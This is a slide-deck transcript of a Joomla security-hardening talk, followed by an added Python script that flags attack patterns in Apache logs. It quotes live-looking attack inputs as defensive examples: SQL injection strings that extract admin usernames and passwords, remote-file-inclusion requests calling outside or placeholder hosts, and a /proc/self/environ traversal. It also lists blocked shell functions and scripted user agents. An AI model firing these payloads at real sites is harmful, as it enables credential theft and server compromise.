
Security talk: Fortifying your Joomla! website

Published in: Technology
Comments:

- "Very nice Radek! Thanks for sharing. Last day I should have cloned myself or something, missed so many good presentations."
- "The article, including the full .htaccess example, can be found here: http://sobi.it/jab10/p/security/"
Speaker notes: Apache 1 and PHP 5; Apache 2 and PHP 4; Apache 1 and MySQL 5. Safe mode isn't safe at all, quite the contrary. But most important: in most cases, if the provider has safe mode enabled, he is saying "I don't want to care about security, so I prohibit everything".
Slide 1: Security talk: Fortifying your Joomla! Website
Radek Suski, http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html
(opening cartoon: http://dilbert.com/strips/comic/2004-01-11/)

Slides 2-7: Where to start?
- Long before you go on-line:
- Choose the right hosting
- Choose the right components
- Inform yourself about good practices ....
- .... it means: you're right here :)
Copyright 2010, Sigsiu.NET GmbH

Slides 8-15: Choose the right host
- Apache 2
- PHP 5
- MySQL 5
- htaccess support
- Safe Mode Off !!!
- Register Globals Off !!!
- Access via SFTP
- HTTPS/SSL support

Slide 16: Choose the right components
- Components published at the JED: http://extensions.joomla.org/
- Check the Vulnerable Extensions List regularly: http://docs.joomla.org/Vulnerable_Extensions_List

Slide 17: Installing Joomla!

Slide 18: Typical hack attempt
...&catid=99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users /*

Slides 19-20: The point is: be unconventional!
- Default username is "Admin"
- User ID of the first super admin is 62
index.php?option=com_vulnurable...&id=-1+UNION+ALL+SELECT+username,password+FROM+jos_users+WHERE+id=62 ...

Slide 21: Change the super admin user ID
http://sobi.it/SuperAdmin/62/

Slide 22: Main problem: we have to deal with kids with too much time
"A scriptkiddie, usually a teenager, is a person of limited technical proficiency who wants to gain control of your system. But, by using a single tool and a system exploit, can cause you a great deal of grief" - source

Slides 23-26: Scriptkiddies
- Are sometimes randomly successful
- Are ambitious
- In most cases causing "only" heavy load. Default Joomla! site: (~23 SQL queries executed + ~15 MB memory used + ~170.000 PHP instructions) x up to 100 hack attempts per minute

Slide 27: htaccess - a powerful weapon
.htaccess (hypertext access) is the default name of a directory-level configuration file that allows for decentralized management of web server configuration. http://en.wikipedia.org/wiki/Htaccess

Slide 28: Default Joomla! htaccess

Slide 29: Prevent access to PHP files
Example log entry:
195.XXX.XX.XX - - [15/May/2005:17:06:00 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://xxxx.yy/id1.txt? HTTP/1.1" 404 95 "Mozilla/5.0"

Slide 30: Forbid access from "dangerous" UA
Example log entries (requests already answered with 403):
"GET /?option=com_xxx&controller=../../../../../../../proc/self/environ%00 HTTP/1.1" 403 1043 "libwww-perl/5.829"
"GET /index.php?option=http://xxxx.go.th/Mail.txt? HTTP/1.1" 403 1029 "Mozilla/3.0 (compatible; Indy Library)"
"GET /index.php?topic=http://xxx.ru/images/cs.txt? HTTP/1.1" 403 1029 "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

Slide 31: Prevent the most common SQL injections
Example log entry:
2274.xxx.com - - [30/Apr/2008:15:38:47 +0200] "GET /index.php?option=com_xxxx&id=1/**/union/**/select/**/1,concat(username,0x3a,password)...
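The three request classes quoted on slides 29 to 31 (a parameter pointing at a remote script, directory traversal with a null byte, and union/concat SQL injection) plus the scripted user agents from slide 30, as detection logic run over constructed Apache log lines. This is an added example, not code from the talk; the hosts, timestamps and the attacker domain in the sample log are placeholders.

```python
# Added example (not code from the talk): triage Apache access-log lines for the
# request patterns quoted on the slides. Hosts and the attacker domain are placeholders.
import re
from typing import Optional
from urllib.parse import unquote

# Apache combined log format: host ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Scripted clients from the slide's 403 entries; ordinary browsers never send these.
SCRIPTED_UA = re.compile(r'libwww-perl|Wget|Indy Library', re.I)
# Each rule is matched against the URL-decoded query string.
RULES = [
    ("rfi", re.compile(r'=\s*(https?|ftp)://', re.I)),        # parameter pointing at a remote script
    ("traversal", re.compile(r'\.\./|\x00')),                  # ../../proc/self/environ%00
    ("sqli", re.compile(r'\bunion\b.*\bselect\b|concat\s*\(', re.I | re.S)),
]

def classify(line: str) -> Optional[dict]:
    """Parse one log line; return host, path, status and the rule tags it triggered."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    # Undo URL-encoding and the /**/ comment padding used to slip past naive filters.
    decoded = unquote(query).replace("/**/", " ")
    tags = [name for name, rx in RULES if rx.search(decoded)]
    if SCRIPTED_UA.search(m.group("ua")):
        tags.append("scripted-ua")
    return {"host": m.group("host"), "path": path, "status": int(m.group("status")), "tags": tags}

def suspicious(lines):
    """Return (host, tags) for every parsed line that triggered at least one rule."""
    return [(r["host"], r["tags"]) for r in map(classify, lines) if r and r["tags"]]

# Constructed sample log, modelled on the entries quoted on slides 29 to 31.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/May/2005:17:06:00 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://attacker.example/id1.txt? HTTP/1.1" 404 95 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [15/May/2005:17:07:12 +0200] "GET /?option=com_xxx&controller=../../../../../../../proc/self/environ%00 HTTP/1.1" 403 1043 "-" "libwww-perl/5.829"',
    '203.0.113.7 - - [30/Apr/2008:15:38:47 +0200] "GET /index.php?option=com_xxxx&id=1/**/union/**/select/**/1,concat(username,0x3a,password)/**/from/**/jos_users HTTP/1.1" 403 1029 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"',
    '198.51.100.9 - - [30/Apr/2008:15:40:01 +0200] "GET /index.php?option=com_content&view=article&id=62 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
]
```

`suspicious(SAMPLE_LOG)` reports the three probing hosts with their tags and leaves the ordinary article request alone; the same rules are what an .htaccess rewrite block would encode, but reviewing the log first shows which patterns actually hit the site.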
Slides 33-35: Disclose as little information as possible
- Admin panel log-in & FTP: who can see it?

Slides 36-37: HTTPS/SSL & SFTP
- Use SFTP instead of FTP
- Use HTTPS for log-in

Slides 38-41: HTTPS/SSL & SFTP - problems
- The provider has to offer SSH/SFTP
- The provider has to offer SSL or an SSL proxy
- An invalid SSL certificate throws an error in the browser
- Valid SSL certificates are expensive

Slide 42: HTTPS/SSL - problems
- Valid SSL certificates are expensive: https://www.startssl.com/

Slides 43-45: Username & Password ... once again
- The username is almost as important as the password
- Automatically generated password: k5dRGCUxGs
- If we can articulate something, we can remember it: https://pass.sigsiu.net/

Slide 46: File permissions
- Very unlucky number: 777

Slides 47-50: php.ini
- Disable "dangerous" functions ??!! disable_functions = system, shell_exec, passthru, exec, phpinfo, popen, proc_open
- how can a function be dangerous ??
- Use open_basedir: open_basedir = /path/to/www

Slide 51: Is your computer safe?
"There is no point in following all the best Joomla! security advice you can find if you don't take the simple step of securing your own personal computer with up to date anti-virus software." Brian Teeman

Slide 52: But what if .... ?
Backup, Backup, Backup ..... and one more time: Backup

Slide 53: Thank you for your attention!
http://www.Sigsiu.NET
https://shop.Sigsiu.NET
http://joomla.Sigsiu.NET
http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html
